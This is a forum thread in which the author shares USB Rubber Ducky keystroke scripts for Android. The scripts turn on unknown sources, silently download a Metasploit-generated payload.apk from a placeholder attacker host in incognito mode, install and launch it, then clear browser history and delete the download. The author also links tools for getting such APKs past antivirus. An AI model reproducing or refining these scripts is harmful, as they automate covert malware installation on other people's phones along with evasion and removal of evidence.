n33dsh3llz Posted February 25, 2017

Hello Hak5 Community,

Trying to figure out how to download a .apk file, then execute it. I know how to download it, which may be enough. Ideally, the whole process could be 100% automated. Maybe I could just sleep the script, giving the user time to launch manually if there are no hotkeys.

I tried opening the downloads inside the browser, but couldn't find a way to select the rows of downloaded files (maybe a security feature). Also, when bringing down the main bar and going to the downloaded file, then launching, it never opened the app other than seeing the AV scan take place.

Note: WINDOWS+N brings down top slider bar & F10 opens downloads in Chrome. Documents said CNTL+J opened downloads, but it wasn't working for me. Can't figure out a way to open the downloaded .apk file.

Here is what I have so far. Keep in mind delays have not been put in yet and this is merely a run-down through using a keyboard:

#Allow unknown sources
ESCAPE #(x whatever for main screen)
WINDOWS+N
UP
ENTER
DOWN ARROW x 6
ENTER
DOWN ARROW x 7
ENTER
RIGHT ARROW
ENTER
ESCAPE #(x whatever to get to main screen)

#Begin the download and install of the payload
WINDOWS+B #Brings up the browser
CNTL+SHIFT+N #Open incognito window (if not chrome, shouldn't do anything)
CNTL+L #Access the URL bar
String http://x.x.x.x:xxxx/payload.apk #types in the file to download
ENTER
** FIGURE OUT WAY TO LAUNCH IT **
TAB TAB #Places you at INSTALL
ENTER
SLEEP X #Give to install
TAB TAB ENTER #Launch

Recent scripts I wrote to bypass Android AV:
https://github.com/jbreed/apkwash
https://github.com/jbreed/apkinjector

For this attack, apkwash would be perfect as it would simply mask the small .apk file generated by MSFVenom. Smaller=faster downloading. Maybe a twin-duck for this would work better to install from local media.

n33dsh3llz (Author) Posted February 25, 2017 (edited)

Ended up finishing the unknown sources setting, but figured it is a waste of time as it can be easily bypassed once attempting to install.

https://github.com/jbreed/usb-ducky-android-download

Here is what I think will work best as there are so many issues that can arise.

Potential issues:
- Default browser not set to chrome. ALT d is to get the URL line for "Internet" app. May add this just to make it fail-safe.
- Default browser not set at all. This will simply require pressing the button to relaunch the script as it should have been set with the first run.

What would take place after:
- Install the apk (bypass untrusted sources, select 'open')
- Clear browsing history if default app wasn't chrome
- Delete the downloaded .apk file (if launched with Chrome, then the script below will take you to the screen afterwards)

DELAY 200
REM ----- BACK OUT TO MAIN MENU -----
ESCAPE
ESCAPE
REM ----- OPEN BROWSER ------
GUI b
DELAY 1000
REM ----- Select url bar and navigate -----
CTRL l
ALT d
DELAY 200
STRING example.com
DELAY 250
ENTER
DELAY 250
REM ----- DOWNLOAD HAS BEGUN -----
REM ----- TIME TO INSTALL MANUALLY -----
REM ----- FOR CHROME, CLEARING HISTORY AND OPENING DOWNLOADS -----
CTRL h
DELAY 300
TAB
TAB
TAB
DELAY 10
ENTER
DELAY 100
F10
DELAY 300
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER

Edited February 25, 2017 by n33dsh3llz: updated